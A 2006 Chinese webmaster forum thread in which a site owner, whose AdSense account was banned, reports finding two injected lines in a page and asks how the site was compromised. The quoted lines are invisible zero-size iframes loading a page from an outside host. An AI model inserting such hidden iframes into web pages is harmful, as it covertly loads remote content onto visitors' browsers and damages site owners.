广告联盟网

GG被K, 这个是不是被攻击的代码

发表于 2006-9-27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上次我的gg被K,我知道是被攻击了,但是却连怎么被攻击的都不知道,今天我无意中打开了一个网站(此网站访问人数极少,我几乎都忘记它了)下载下来准备编辑时,却发现底部多了两行代码,如下:
<iframe src=http://huhack.googlepages.com/4.htm width=0 height=0></iframe>
<iframe src=http://huhack.googlepages.com/4.htm width=0 height=0></iframe>
我虽然不能确定这两行代码是什么意思,但是我敢肯定有人对我的网站动个手脚。
我的这个网站只有几个纯html页面,没有动态的交互页面,黑客是怎么样得到控制权限的,能投诉虚拟主机提价方吗?或者上面的网站又是谁的,可以报警吗?

我的损失情况如下:
做gg第一个月收入130$左右,哪时候的网站访问量还比较低,第二个月(IP提高到3000左右)每天>10$,有时候超过20$,现在日独立IP:8000左右,收入就不计算了。最关键的是,我从没有作弊,但是却因为这样被K了,真的很气愤...
发表于 2006-9-27 | 只看该作者
你被k了以后怎么办? 现在又开通了吗?
 楼主| 发表于 2006-9-27 | 只看该作者
还能怎么办,当然是申诉了,不过没有成功。后来试着去再申请了一次,做了几天,还说已经给我发pin码来了,第二天就说帐号关联了。被K之后,不管你以前怎样,都很难了,非常痛恨哪些乱来的人
发布者有责任保护自己的帐号安全.
我认为应该是GG有责任维护发布者和广告者的利益!